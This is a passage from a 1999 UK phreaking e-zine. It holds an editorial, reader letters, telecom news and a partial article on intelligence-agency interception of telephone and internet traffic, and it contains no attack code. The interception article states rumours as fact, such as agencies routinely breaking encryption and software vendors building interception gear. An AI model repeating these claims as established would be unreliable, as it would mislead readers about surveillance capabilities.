[ D4RKCYDE ] yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| [ F41TH ISSUE TEN: OCTOBER 1999 ] . . : | +-----------[ hybrid * http://darkcyde.phunc.com +-----------[ jasun * http://hybrid.dtmf.org +-----------[ zomba * #darkcyde EFNET +-----------[ digiphreq * mailto: hybrid@dtmf.org +-----------[ downtime * mailto: hybrid@unixcode.com +-----------[ force * +-----------[ lowtek * +-----------[ bodie * +-----------[ microwire * +-----------[ shadowx * FIND US ON THE PSTN, B1TCH +-----------[ sintax * +-----------[ shylock * (C)D4RKCYDE 1997,98,99+ +-----------[ elaich * +-----------[ mata * | * +----------------------------------------------------------------+ | : . So close it has no boundaries... A blinking cursor pulses in the electric darkness like a heart coursing with phosphorous light, burning beneath the derma of black-neon glass. A PHONE begins to RING, we hear it as though we were making the call. The cursor continues to throb, relentlessly patient, until... . : | -+[ editorial and introduction to f41th 10 +-> jasun/hybrid <---+ -+[ letters to f41th & D4RKCYDE +-> doods <---+ -+[ news update /bt adsl +-> hybrid <---+ -+[ government covert telecommunications interception +-> hybrid <---+ -+[ DDSN intellegent network +-> kelticphr0st <---+ -+[ guide to being arrested in the uk +-> bodie <---+ -+[ meridian security audit, and switch hacking +-> hybrid <---+ -+[ sco buffer overflow lameness +-> darkraver <---+ -+[ making chipz +-> hitman <---+ -+[ systemx internal network operations /structure +-> hybrid/GBH <---+ -+[ digital access carrier system DACS +-> hybrid <---+ -+[ outness +-> jasun/hybrid <---+ | : . "when we come to your town, bow down" -the w00 . : | +-+[ editorial ]+---> by jasun <--------------------------+ +-+[ D4RKCYDE ]+---> jasun@phreaker.net <--------------------------+ | : . Here we are with f41th issue 10, edited this time around by jasun. I suggested to hybrid that I would take the job of editing and compiling this issue of f41th, so he could have a break from it for a while. So, here we are again with another issue packed full with info straight from the heart of some twisted but intelligent people, who are constantly increasing their knowledge base and kindly passing their knowledge onto you! You may have noticed some new sections in this issue, such as News and Letters. We decided that we would inlude these to let you all know some of the feedback we receive, as always some positive and some negative, everyone has their own opinions. The main thing is that by reading any issue of Faith and indeed any ezine or article, you are hopefully learning something new that you did not already know about or expanding your knowledge futher to what you already did know. Afterall, spreading knowledge to others is what it's all about... "Share what you know and learn what you don't" as they say. Also, just a little note about some two upcoming events, Catastrophe '99 & H2K. Catastrophe '99 will be held on the 4th December '99 in Manchester, United Kingdom. It's mainly a party, but from information that is flowing around, there will be speakers and much more as well. It should be a good event, considering the success of the previous Manchester parties. I don't have a url for this event yet, but it should be up soon. More details as they are announced will be posted in the next issue of Faith. H2K, Hope2000 will be Held in New York City, from July 14-16th next year. As this event is a little further away than Manchester, we are going to be booking travel and accomodation much earlier. A group of people are going from the UK, if you are considering it, please contact us as we can probably organsise a group discount deal if we all book together. H2K will be a 24 hour event for the full three days, as far as speakers and events are concerned, check out the official conference website, http://www.h2k.net Enjoy this issue, jasun. : " Good. Adaption. Improvisation. But your weakness isn't your technique. " -Morpheus/Matrix . : | +-+[ letters to f41th ]+---> <-----------------------------+ +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+ | : . Date: Wed, 4 Aug 1999 04:53:07 +0100 From: wheeler14@postmaster.co.uk To: hybrid@dtmf.org Subject: URL http://hybrid.dtmf.org/main.html Hi, i am a relative newcomer to phreaking and i was wondering if you could just answer a simple question for me.: whilst scanning 0800892xxx i kept getting an american woman saying, "your call cannot be completed as dialed please check and try again", prey tell if you will, what the ?$"£< does this bloody mean. i take it that these numbers are something to do with direct dialling, however i am probably totally wrong. If you could help me out with this poxy woman as i will scream if i hear her again. if you can assist i can be contacted through this mail address: wheeler14@postmaster.co.uk cheers, MAV [ yo mav.. "your call cannot be completed as dialed, please check the number and try again, 2BM".. anoying huh? Try scanning O8OO 96X-XXX, then you'll really see how anoying the stupid telco international DMS gateway recording really is. The answer is quite simple, where the 2BM recording is, a terminating line once existed. Infact, I'm sure that anyone that scans will find this 2BM recording EXTREAMLY anoying, infact, going through my scans I have just worked out that I've had to listen to that 2BM whore 2,429 times.. my advise to you: after listening to that damn recording over and over and over and over and over again, you'll notice a faint humming noise on the line just before the b1tch begins to speak.. just do what I do, hang up before you have to listen to it. If you are truely twisted and insane (like me) you can goto www.telecom-digest.org and follow the link to a website called "the website you have reached" where you can listen to 1OO's of telco fault/test recordings in .wav format. For those of you who want to hear this damn recording (from the UK) dial one of the following numbers, try to resist the urge to smash up your telephone... O8OO 961 OO6, O8OO 961 O21. ] Date: Sun, 25 Jul 1999 04:03:08 +0100 From: xrayman To: hybrid@dtmf.org Subject: subscribe subscribe xrayman@freeuk.com [ heh ] Date: Thu, 29 Jul 1999 21:15:16 +0100 From: tommy To: hybrid@dtmf.org Cc: tmcoy@globalnet.co.uk Subject: phreaking Regarding the uk phreaking scene, I hope you could please e-mail up-to-date information on obtaining free calls from bt phoneboxes and cocots and boxing including blue, black etc ( including wether any of the above are possible now in 99). As I have read alot of files on the web most if not all are outdated therefore I was hoping for you to provide some useful e-mail or irc sources because any new info is not released to the web to prevent BT who can monitor the web from holing up any loopholes. Finally, would you kindly obtain some bulletin board numbers with info on the above and comment on their usefulness. tommy [ heh. tip: nothing is outdated or obsolete, people just forget how to do shit. Phreaking is not about making free calls. I'm not going to mail you codez. BBSs: I used to run one, I got pissed off with ppl dialing up in the hope that when they discconect they will have the abilty to place free calls. BBSs are rare these days, and in most cases are aimed at people that take a more serious approach to the 'scene' (no k0d3 kiddies) - try altavista.com keywords "help i'm lame" or goto the library and get "toll-fraud for dummies" ] Date: Fri, 23 Jul 1999 18:04:45 +0100 From: Neon Bunny To: hybrid@dtmf.org Subject: Faith I'm currently compiling a collection of files about different types of systems (e.g. Shiva-LAN-Rover, VAX etc.) and how to identify them. I'd be grateful if you'd give me permission to distribute your article from Faith 3 on Shiva-LAN-Rover systems. I'll just snip the article but leave the header including the author's name & email. While on the subject of permission, I take it that it's ok to distribute the full collection of faith (1-7) at my site below, if not then let me know and I'll shift 'em. I also have a handscan of 0800 891XXX which I can send if you want it for the next faith. NeonBunny --- Have you seen the new BunnyBox??? www.bunnybox.f9.co.uk [ werd. n/p dude.. just one thing: if you decide to distro f41th on ya box, be sure to have the latest issue linked to the following address.. ] f41thx This message contains non-ASCII text, which can only be displayed properly if you are running X11. What follows may be partially unreadable, but the English (ASCII) parts should still be readable. please help me iam being bothered by this lad but i cant get his ip address to bother him back could you tell me how? shaggy@corl.fsnet.co.uk [ ? ] i have been reading faith zine for some time, and i was wondering if subscription is possible where some auto-bot would notify us, devoted users, of every new issue. thatnk you for your time. -- Be well, Net Runner [ just download it ] just a quick one,,,,,don't take away the ascii logs,, the humour in them and the similar funny parts of f41th are the things that set you apart from the "other mags". Like for example the fun you had in #jesus. that reminded me of when i went in there,, took the piss out of the ops for not being christian enough...(i was arguing that jesus wouldn't ban ppl from the chat room)...... the logs and other stuff make the readers think that the zine's being written by people we understand and emphasize with. it's nothing massive but it's one step away from the mag we can read and laugh at the same time. cheers anyway, mail us back if you want to discuss anyfing,,, or catch me on efnet - Degener8 [ yeah/ish ] Hi, Just a quick note to say what a great site you have got and to ask a quick question. If I wanted to obtain Tools and Equipment for research purposes to do with hacking/phreaking where could I get hold of them? Cheers THE FAT MAN [ the donut store ] This message contains non-ASCII text, which can only be displayed properly if you are running X11. What follows may be partially unreadable, but the English (ASCII) parts should still be readable. APT Issue 5 is now out. Download it from: http://surf.to/krash For subscription information, email me with the subject CMD:HELP [ NO#@~%$!! - your magazine and its SWAT team crew can suck my left nut. All the stuff on your site sucks, i dont wanna know how to blow shit up, I THINK I KNOW HOW TO FUCKING RED B4WX.... GO AWAY, AND SEEK HELP ] " Your spoon does not bend because it is just that, a spoon. Mine bends because there is no spoon, just my mind. " -SpoonBoy/Matrix . : | +-+[ f41th Newz ]+---> by hybrid <-----------------------------+ +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+ | : . /* * UK moblie telecom companys asked to * cut down on cellular masks */ UK cellphone companys such as Orange, one2one, cellnet etc have been told not to install to many radio masks. The fact is, we need more to improve reception, but alot of people seem to think they ruin the scenery of England. WTF?.. This is no shit, now cellular giants such as cellnet are developing anttenas that are in the shape of trees and brown in colour so they "blend in" LOL. In one area of the UK, an anttena was errected near to an old persons home, soon after, residence of the old peoples home complained that the CellNet radio mask was interfering with thier hearing-aid equipment! And of course the mask was taken down and moved, so a whole bunch of people lost cellular coverage simply because some old hag's hearing aid.. shiet@œ$! what is this country! -- i want out!, wheres my ticket to NY? /* * BTs new generation of switches * for the UK communications backbone. */ BT have announced a framework agreement with Ericsson for the development and supply of the next generation, high performance switches designed to meet the needs of the rapid data traffic growth in the UK. The deal is worth potentially up to œ270 million and will secure BTs network capacity into the next millennium. The new switches from Ericsson will enable BT to expand its backbone network capacity rapidly to meet the anticipated growth in Internet, high speed data and video services. The Ericsson switches will integrate seamlessly into BTs existing network. The switches will be deployed over the next four years using state of the art technology, providing initial switching capacities of up to 160 Gigabits per second and future growth into Terabits. The first switch was scheduled to go live in June, 1999. All switches will be directly connected to BTs optical fibre SDH network, which currently has more than 600 nodes and is doubling in size every year. Installation work to replace existing trunk switches with the new high performance switches started during 1999 and will continue over the next four years. This investment is over and above the œ800 million expenditure BT announced last May, which is being used to extend significantly the reach of BTs core Synchronous Digital Hierarchy (SDH) optical fibre transmission network and exploit Dense Wave Division Multiplexing (DWDM) technology. /* * Oftel look into ADSL * (about fucking time) */ There are many things that I dislike about BT and UK regulators such as Oftel, one of them being they all brag about "High-Tech" technologys on the UK PSTN such as ISDN, or how gratefull we should be that we _only_ have to pay 1p a minute for local calls (net access). Like, get with the program, heh. BT need to sort it out.. ISDN blows, but they seem to think its the forefront of technology.. Oh yeah, not to mention the fact that if you have a standard line, and ask BT for a second line for net access, guess what? - they wont install a second line for you, they will stick a device such as the DACS (Digital Access Carrier System) on your line which will split it into 2 seperate carriers.. W0W, thanks BT, now I can join the "BT SuperHighway" at lightning speeds of a maximum of 28800bps, and courtisy of BT "SuperHighway" I get bonus CRC checksum errors! IF YOU ARE ONE OF THE MILLIONS OF UK BT SUBSCRIBERS THAT ASKED BT TO INSTALL A SECOND LINE FOR YOU, CHANCES ARE YOU HAVE A DACS II, OR WB900 UNIT MULTIPLEXING YOUR LINE.. TRY DOING A SALT TEST FROM THE LINE.. 17070.. IT WONT WORK CUSE THAT LINE IS NON EXISTANT. PHONE BT _NOW_ TELL THEM YOU DONT WANT THEIR PIECE OF SHIT "HIGH TECH" DACS UNIT ON YOUR LINE.. GET WHAT YOU PAID FOR (A REAL LINE). DACS/WB900= 28.8, TELL THEM WHERE TO GO. note: I know someone that had a BT DACS line spliter fitted who asked BT for a SECOND line.. we phoned BT and asked why this was.. " dood, why can I only get 28.8 on my line? " " you need to update your modem " " i have a 56k modem, it doesnt like your DACS superhighway " blah blah blah.. then they said... (get aload of this shit) " The reason the DACS II system is deployed is because we have concerns about the environment, if everyone had 2 lines it would be wires everywhere.... " AND..?? BT seem to think that including E.T. in their lame-ass adverts will impress customers with their services.. The money they spent on the copyright rights to show E.T. was probably enough to update an exchange, but thats BT for you, they'll be selling baked-bean cans with string attached to them soon.. THEY DONT CARE ABOUT UK TELECOMS.. THEY JUST WANT YOUR 1P p/m Anyways, I'm getting worked up here, so I'm going to continue with the newz.. The UK telecoms regulator Oftel, has proposed that ADSL should be present in rural and "disadvantaged" areas of the UK, therefore BT have (proposed) that 400 exchanges will be updated to carry the "new" technology by March 2000.. Areas that will benifit from ADSL (Asymmetric Digital Subscriber Line) are as follows: London * Cardiff * Belfast * Coventry * Manchester * Newcastle * Leeds * Edinburgh * Glasgow * Heh, BT need to sort it out.. considering ppl in NewYork are able to get 7 Mbit/sec ADSL connections (equivalent to 1,500 BT "superhighway" connections) sn1per$/sbin/ping :( For more information regarding Oftel and BT goto: www.oftel.gov.uk or www.bt.com /* * PLE (phone loosers of england) * appologise to D4RKCYDE... */ [ taken from http://www.phoneloosers.com ] [ phoneloosers of england ] 03/09/1999 PLE Appologises to D4rkcyde "We want to apologise to d4rkcyde for including some of their scanned numbers in the PLE Phone directory without getting their permission. OKaos sent you an E-mail but when you never replied he stupidly took this as a yes, and this was obviously wrong. OKaos has now been relieved of his duties of Editor - we felt this was the best thing to do. If we could find any of your important members on IRC or anywhere else for that matter we would apologise in person, but as we can't even find your site anymore this will have to do. Sorry Guys, hope you can understand / forgive..." irc: #darkcyde efnet url: http://darkcyde.phunc.com " Fuckin' idiots don't know shit. " -Neo/Matrix . : | +-+[ Government telecommunications interception ]+---> by hybrid <-----------+ +-+[ D4RKCYDE ]+---------------------------> hybrid@dtmf.org <-----+ | : . BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ] Covert Government/Military Interception of International Telcommunications. (Pure Paranoia) Written for f41th magazine, October 1999 by hybrid Part I 1. Introduction 2. Communications Intelligence (COMINT) and the NSA a) UKUSA Alliance 3. The Covert Interception of International Telecommunications a) International Leased Carrier (ILC) Interception b) High Frequency Radio Interception c) Interception of Microwave Radio Relays d) Interception of Submerged Telecommunications Cables e) Covert Communications Satellites f) Communications Techniques o Operation SHAMROCK o More High Frequency Radio Interception o The Space interception of InterCity Networks o SIGNIT Satellites Part II 5. Introduction to part II a) Submarine Cable Interception b) Covert Interception of the Internet Protocol 6. Covert Collection of High Capacity Signals a) New Satellite Networks/Systems b) ILC Processing Techniques 7. Hardcore Telecommunications Covert Interception a) Broadband (High Capacity Multi-Channel) Communications b) Covert Telecommunications Interception Equipment o Extraction of Wideband Signals and Data Analysis o Covert Data Processing, Fax Transmission Analysis o Multi Protocol Traffic Analysis Techniqes c) Speech Recognition and Voice Interception o Advanced Speech Recognition, Real CallerID 8. Closing, Summerisation a) My PGP Key ;> Part I ------ 1. Introduction =============== Are you paranoid? You damn well should be. I've recently come accross some very disturbing facts about how international covert governemt organisations intercept, filter and colate data from international communication protocols and networks. This article is only the very tip of the iceberg, their is no way I could possibly cover the wide spectrum of "big brother" activity that shadows over the communication networks that are deployed at present, to do so would require a whole database. The fact is big brother IS watching you, not just you, but also other governments and echonomical bodies. In this file I will discuss the different, very covert techniques that are deployed by certain agencys and alliances to efectivly intercept any type of public, or supposid "classified" data/voice transmission. After reading this article, you'll probably think twice before placing a phone call. 2. Communications Intelligence (COMINT) and the NSA =================================================== COMINT is an abbreviation for Communications Intellegence. The covert interception of telecommunications has existed for a very long time, and began around about the same time that public telecommunications became widely available. It is evident that every single "technologicly advanced" country in the world participates in the covert interception of foreign communication mediums. I would define it as an ongoing game of counter- intellegence, where superpower nations are spying on each other, spying on each other. The scary thing is, it's not just diplomatic communications that are being intercepted, in most cases, an entire nations telecommunications infastructer is being monitored, both from remote locations, and from our own intellegence organistaions spying on us. The NSA openly admit to such activity, although would probably deny any "local" communication interception techniques. COMINT is in the same intelllegence fammily as SIGNIT (Signals Intellegence) which involves the interception of signal emmisions from sources such as radar emmisions. Obvious COMINT communications targets: (interception) o military communications o diplomatic communications o economic intellegence o scientific intellegence o drug trafficking o organisied crime o severe fraud o terrorism Side note: hacking, phreaking, participation in "underground" hacking collectives would be defined as organised crime, and in some cases defined as terrorism. (they have a real nice way of classifying things) a) UKUSA Alliance USSS (United States Signit System) is made up of the NSA (National Security Agency), collective sub-units known as the "CSS" (Central Security Service), aswell as some parts of the CIA and surrrounding organisations/bodies. After the second world war in 1947, the US made and aggrement with the UK to commense international intellegence operations world wide. Other English speaking countrys where allied into the UKUSA aggrement as second partys, they include Canada, NewZealand and Austailia. The UKUSA intellegence alliance was not exposed until earlier this year (March 1999), when the Austrailian government confirmed its deployment of DSD (Defense Signals Directorate) and admited to being part of the UKUSA colaboration of intellegence gathering. 3. The Covert Interception of International Telecommunications ============================================================== a) International Leased Carrier (ILC) Interception A knowledgable phreak will know how easy it is to intercept supposid private telecommunications, we all know that the US PSTN (Public Switched Telephone Network) is made up of RBOCs (Regional Bell Operating Companys) which all deploy multiple levels of switching architecture and signal protocols. For over 80 years, incomming and outgoing international telecommunications traffic passing through International eXchange Bounderys have been intercepted and filtered for an initative known as "National Security". All US RBOCS have strong links with COMINT, and IXCs (Inter eXchange Carriers) such as AT&T have ties with goverment communication collectives. COMINT organistaions refere to such carrier providers as ILCs (International Leased Carriers), and would obviously have to work closly with such providers where telecommunications interception is involved. b) High Frequency Radio Interception The majourity of the worlds international contempory telecommunications networks are made up of optical transmission protocols, but before this, most international telecommunications where conducted via HF transmission (Higher Freqency) and was used both for public communication aswell as diplomatic and military communications. ------------x-----------------------x-----------------------x / \ / \ / / \ / \ / / \ / \ / / \ / \ / / \ / \ / x-----------------------x-----------------------x------------- x) y) z) In the above diagram, (x) is transmitting to (z). The HF signal is bouncing from the Earths ionosphere back down to (y), then back to the ionosphere, down to (z). Incididently, in this scenario, (y) is the dude in the middle, incercepting the transmission before it reaches (z). Here, the interception of transmission was reletivly straight forward because HF radio transmissions are bounced from the Earths ionosphere and back down to the Earths surface, forming a zigzag type path around the world. This provided ample space for a primitive "man in the middle" interception of the reception of such data. c) Interception of Microwave Radio Relays Microwave radio was deployed in the 1950s as a means to provide higher- cappacity inter-city communications, implementing telephony and televison. Microwave parabolic dishes are placed around 50km apart from each other, as a means of communicaion relay stations. Later I will discuss how such a communications medium can be intercepted. d) Interception of Submerged Telecommunications Cables Early international telecommunications where very primitive compared to what we have today, and only allowed a maximum capacity of 100 telephone calls on similtanious channels. Today Optical Fibre transmission systems are deployed as part of the world wide PSTN, and can handle 5Gbps of similtanious data transmission, which is 60,000 phone calls occuring similtaniously, which is why we no longer require operators to place international calls. e) Covert Communications Satellites Because of the nature of microwave emmisions, they do not reflect off of the Earths ionosphere like HF radio transmissions. Instead, they penetrate the Earths atmosphere and are emited off into space. This is where the covert satelites come into the picture. x salelite / \ / \ / \ / \ / \ ------------x-----------------------x------------ ionosphere / \ / \ / \ / \ / \ x-----------------------------------------------x- earths surface x) z) The most popular satelite setup are those that operate in geo-stationary orbit, or (the clark belt) and are provided for broadcasting purposes. The largest collection of communications satelites in orbit are the COMSATs and are operated by the International Telecommunications Satelite organisation (Intelsat). The latest addition of telecommunications satelites can handle over 90 thousand similtanious calls each. f) Communications Techniques Before 1970, the majourity of communications systems where of anolouge nature and utilised continuous wave technique. Now, in all majour communication systems are digitaly derived, and provide a much higher capacity. The highest capacity systems are for use of internet backbone usage (STM-1/OC-3) and can operate at data rates of 155Mbs (Million bits per second) which is the equivalent to the transmission of 1 thousand books a minute. I'll cover these transmission techniques in more detail in the technical part of this file. Where this type of digital communication is deployed COMINT organisations cannot intercept data unless they have diect access to the communications channels that the data travels over. The data is usually encrypted, but no big deal for such an collective as COMINT, so they obtain access to these communications channels with (or without) the prior co-operation of the carrier provider. o Operation SHAMROCK The NSA are well known for systematically gathering telecommunications traffic from offices of majour cable companys. The interception of cable traffic in the US is refered to as "operation shamrock", and until recently remained un-exposed for over 30 years. In 1975 an NSA director admitted to the US house of representatives that such operations do exist within the NSA. "..The NSA systematically intercepts international communications, both voice and cable" "messages to and from American citizens have been picked up in the course of gathering foreign intelligence". "...was obtained incidentally in the course of NSA's interception of aural and non-aural (e.g., telex) international communications and the receipt of GCHQ-acquired telex and ILC (International Leased Carrier) cable traffic (SHAMROCK)..." o More High Frequency Radio Interception HF radio transmissions are easy to intercept, in the sense that all you need is the appropraite equipment, and an area which is located in a quiet radio location. Up until 1980 the NSA and the UK's GCHQ used HF radio interception equipment to capture European HF communication on a base in Scotland. The equipment used then was a 400 meter in dialmeter antenna, and was designed to be omnidirectional (capture emitions from every possible angle). Their is a secret base in the UK at Chicksands which is operated by the NSA and DODJOCC, It's purpose is to collect and intercept Soviet and Warsaw Pact air force communications, and also to collect ILC and "NDC" (Non-US Diplomatic Communications). o The Space interception of InterCity Networks Long distance microwave involves the implementation of many transmitters and relay stations. When a microwave transmission takes place, the recieving end only absorbs a small fraction of the orional signal strength, the parts of the microwave transmission that the reciever didn't pick up pass through the Earths atmosphere into space as discussed before. Therefore, contempory microwave communications are intercepted by covert intellegence gathering satelites that are mounted 80 degrees longditude of the horizon. At present, their are many secret satelites operating both in geo-syncronous orbit aswell as satelites following mission paths that gather as much microwave communication traffic as possible and relay back to secret installations on Earth. o SIGNIT Satellites The CIA first launched the SIGINT satelite program back in 1967 which lasted until 1985. The satelites where operated from remote ground installations in Austrailia and implemented parabolic antenna which where able to unfold once in orbit, initially the satelites intercepted transmisisons from the VHF radio band. To this date, similar satelites are in use, codenamed MAGNUM and ORION, they are designed to intercept and filter multiple communications methods on Earth such as VHF radio, cellular and mobile phones, pagers, and also mobile data links, packet radio etc. The idea of this is fairly daunting, basically if you page your girlfriend, chances are the pager radio signal will be intercepted but probably filtered as it would be of no relevance to "national security". This is not some paranoia/conspiracy theory, this is fact. The IOSA system (Intergrated Overhead Signet Architecrure) is very much at large to this date, and is controled from ground level at the following locations accross the world: o Buckley Field, Denver, Colorado o Pine Gap, Australia o Menwith Hill, England o Bad Aibling, Germany Each "secret" installation is rumoured to cost alot of money to run, somthing in the line of 1 billion dollars each. In 1998, the US National Reconnaissance Office (NRO) said it would combine the three separate classes of Sigint satellites into an Integrated Overhead Sigint Architecture (IOSA) in order to " improve Sigint performance and avoid costs by consolidating systems, utilising ... new satellite and data processing technologies". Because of this new spy satelite setup in earth orbit, the US can now use its newly aquired technology to intercept ANY mobile communications source, including city to city traffic accross the globe. The main intension of these satelites is however to concentrate on foreign military and diplomatic "hotspots". GCHQ in the UK are now part of project MERCURY and use the system for similar purposes. Part II ------- Introduction to part II ======================= Summerising part I, we now know about covert satelites, the basess, and the general layout of microwave interception. Now I'm going to discuss the slighlty more scary stuff, the parts that affect me and you, ranging from the interception of phone traffic, to the mass intellegence gathering on the internet. Hopefully you've read all of part I so you can understand the folowing better, if you just paged you suck. Submarine cable interception Submarine cables are widley used in international telecommunications, and are therfore a target for anyone wishing to intercept international telecommunications traffic. Juring the 1970s, a secret submerged cable taping operation nammed "IVY BELLS" was executed by US submarines near the USSR. The mass line tap operation of USSR communication ended in 1992 when the geographic locations of the submerged line taps where sold to KGB by a former NSA employlee. To this date, the US still plant submerged line taps on various communications links, rumoured to be the Middle East, the med, eastern asia, and south america. The United States is the only naval power known to have deployed deep-sea technology for this purpose. Where fibre Optic cables are concerned, it is impossible to simply place a radio sensitve inductive tap on them, because obviously fibre Optics don't leak radio freqency signals. However, the NSA spend alot of time and money into the research of Optical fibre tapping, and are rumoured to be successful in such research using optoelectronic "repeaters" which boost signal levels over long distances. Covert Interception of the Internet Protocol ============================================ The NSA and GCHQ all operate a private network which is concidered to be just as large as the public net. This private network is known as project EMBROIDERY and is said to span the globe via a massive WAN network. It is this network which is said to serve such purposes as project ECHELON and other intellegence projects. The whole system is based on the IP protocol. The majority of internet traffic origionates or is passed through the US, and major routers. Sinse early 1990, the COMINT project have developed systems which intercept and filter all packet, or digital data traveling via the US net backbones. The targets of such interceptions are communications between Europe, Asia, Oceania, Africa and South America. When a packet is sent, depending on the time stamping of the origin and destination, it is likely it will pass through a major network exchange somewhere in the US. For example, routers in USwest are most idle when European packet traffic is at its peak beacuse of the time zone differences. Because of this, hig capicity network traffic will pass through the routers which are situated in USwest, which subseqentialy the NSA have access to (for COMINT purposess), it is then that the NSA can intercept data traveling to and from European countrys. Where COMINT and the internet are concerned, COMINT interception takes advantage of the way in which internet packets are routed, in the sense that datagrams contain the numerical routing instructions which are used by COMINT to filter irrelevant traffic. Any packet with a military or diplomatic datagram origin, is likely to be intercepted at a major US network backbone to be filtered or analyised. alt.Usenet discussion groups are well known to be intercepted and analyised by government agencys, such usnet traffic accumulates about 15 gigs of transmitted data per day. Intellegence agencies have open access to all usenet discussion groups, and most store the information in massive data- bases. For example, in the UK, the DERA (Defense Evaluation and Research Agency) maintain a 1 terrabyte databasse which contains 90 days worth of all usnet messages. DERA also operate web-robots which scan the net for certain keywords and then mirror entire sites on this database. Subseqentialy my own site has been visited by DERA, and sinse then is visited 2 per month by, xxx.dera.gov.uk - - [18/Jul/1999:16:10:05 -0500] "GET /files/hybrid-files/x Recently an NSA employee informed the public that certain major backbone net exchanges are being monitored for ALL data traveling through them in the US. The NSA either have direct access to them, or have mass sniffer programs running to collect as much data as possible traveling through the follwowing major internet exchanges in the US: (NSA Internet Comint access at IXP sites) Internet site Location Operator Designation ------------------------------------------------------------------------------ FIX East College Park, Maryland US government Federal Information Exchange ------------------------------------------------------------------------------ FIX West Mountain View, California US government Federal Information Exchange ------------------------------------------------------------------------------ MAE East Washington, DC MCI Metropolitan Area Ethernet ------------------------------------------------------------------------------ New York NAP Pennsauken, New Jersey Sprintlink Network Access Point ------------------------------------------------------------------------------ SWAB Washington, DC PSInet/BellAtl SMDS Washington Area Bypass ------------------------------------------------------------------------------ Chicago NAP Chicago, Illinois Ameritech Network Access Point ------------------------------------------------------------------------------ SanFran NAP SanFrancisco, California Pacific Bell Network Access Point ------------------------------------------------------------------------------ MAE West San Jose, California MCI Metropolitan Area Ethernet ------------------------------------------------------------------------------ CIX Santa Clara California CIX Commercial Internet Exchange ------------------------------------------------------------------------------ It is rumoured, and almost certanly true, that a leading US telecommunications and internet provider company are contracted with the NSA to develop specialised mass data gathering software for installation on such internet exchanges, other software manufactures such as microsoft and netscape etc are said to aid in the production of specialised network traffic interception equipment. (see enclosed .jpg files for screenshots) 6. Covert Collection of High Capacity Signals ============================================= Where very sensitive data is concerned, diplomatic agencies are usually very wise to the fact that someone out their may be interested in intercepting it. Therefore, when the more obvious interception methods/procedures are inpracticle, COMINT agencies develope special devices that can be installed on the target premisiss or base. The NSA manufactures specialised equipment for use in covert activitys, one such device is called the "ORATORY" -a computer that fits into a brief case, which is programed to behave on dictionary selection for use in sigint data interception. a) New Satellite Networks/Systems A popular means of communication for government employees are private dedicated mobile communications. Their are satelites orbiting very fast around the earth, each in its own orbit pattern which provide global coverage for diplomatic usage. These systems are sometimes called Satelite Personal Communications Systems or SPCS. At present, their is a satelite network called the IRIDIUM network, which was launched in 1998. The IRIDIUM satelite network implements 66 satelites each relaying mobile data back to the ground. IRIDIUM is considered to be fairly secure, in the sense that anyone trying to intercept network data would have great trouble as the satelites are fast moving and only beam information back down to earth in a concentrated beam. b) ILC Processing Techniques Covert agencies employ a vast array of multi-protocol data interception systems and devices. Such devices are capable of intercepting selectable, or randomly chosen communications channels implementing a new concept called "topic analysis". It has been a rumour for a long time that covert agencies use equipment that is capable of reacting to certain keywords when intercepting voice or modem traffic. It is rumoured that if you say somthing like "kill_the_presedent" over the telephone, you'll have a gathering of feds outside your front door. This rumour however, is probably not true when refering to a residential line, unless a line has been "tapped" beforehand. However, such systems DO exist, and all operate on topic analysis techniques. For example: Such systems are based on dictionary computers with built in (pre-programmed) key words. These systems are designed to be placed in the paths of communications channels, such as standard voice traffic, or modem links. The properties of such systems are as follows: o A topic analysis COMINT system would be "attracted" to certain levels of communications traffic, such as international calls to and from "hotspot" areas, above normal calling freqency (scanning, or suspicious overusage of a given communications protocol). o ability to "pick-up" on certain keywords, or signitures. o voicetracking capabilitys, ie: voice recognition, freqency analysis of voice patterns. It is therefore presumarable that such monitornig devices may be attracted to any given voice/data channel if such patterns are emited, ie: heavy call usage. However, such interception techniques can be impaired to a certain extent, when the channels being monitored implement voice or data encryption, hense the international export laws on cryptographic engines and alghorithms. Comint interception devices are individualy designed to intercept differnt arrays of communications protocols, for example, some devices are designed soly to intercept internet traffic (packet analysis, headers etc) others are designed to intercept pager signals, and voice traffic (topic analysis). Any type of publically known communications medium is subject to interception by a foreign source (if their is motive). 7. Hardcore Telecommunications Covert Interception ================================================== a) Broadband (High Capacity Multi-Channel) Communications taken from a 9x file by me (FDM): http://www.ninex.com/9x/rawtext/9X_TEL.TXT ------------------------------------------------------------------------begin- To maximise the frequency spectrum available over trunk cables and international links, the subscribers base band voice signals covering from 300 to 3400 Hz are translated usinga sideband (SSB) modulation to a higher frequency range suitable for propagation over coaxial cables and radio links. 12 basic channels are modulated on to carriers in the range 64 to 108 KHz and speed 4 kHz apart. When the lower sideband (LSB) is selected, these form a 'group' with a bandwidth of 48 kHz, extending from 60 to 108 kHz. Five groups are then modulated in a similar manner onto carriers spaced at 48 kHz intervals from 420 to 612 kHz to form a 'supergroup'. 16 supergroups are then LSB-SSB modulated onto carriers spaced by 248 kHz from 1116 kHz upwards. This results in band of freqencies from 564 kHz upwards. To utilise the range bellow 564 kHz, a supergroup is modulated on to a 612 kHz carrier which after selection of LSB is reduced to a band between 60 and 300 kHz. The band between 300 and 564 kHz is filled with another supergroup in basic form (312 to 552 kHz). This hierarchy, referred to as 'master' or 'hypergroup', provides a muliplex (including freqency gaps or guardbands to cater for the characteristics of practical filters), with an upper frequncy of close to 4 MHz which is easyily carried over a coax cable. --------------------------------------------------------------------------end- Analouge communications are now more or less obsoleet as literaly all international telecommunications protocols and developments turn digital. Digital telecoms are based on a method called TDM (Time Division Multiplexing), this alows multi-channel communications to take place. The individual conversational channels are first digitised. Information concerning each channel is then transmitted sequentially rather than similtaneously, with each link occupying successive time slots. Bell implement t1 links as part of the majour routng backbones on the US PSTN which handle 24 phone channels at 1.544 Mbps. European countrys, such as the UK, operate on slightly higher transmission speeds as part of the backbone. Instead of T-1 technology, European telco providers have implemented a different protocol called 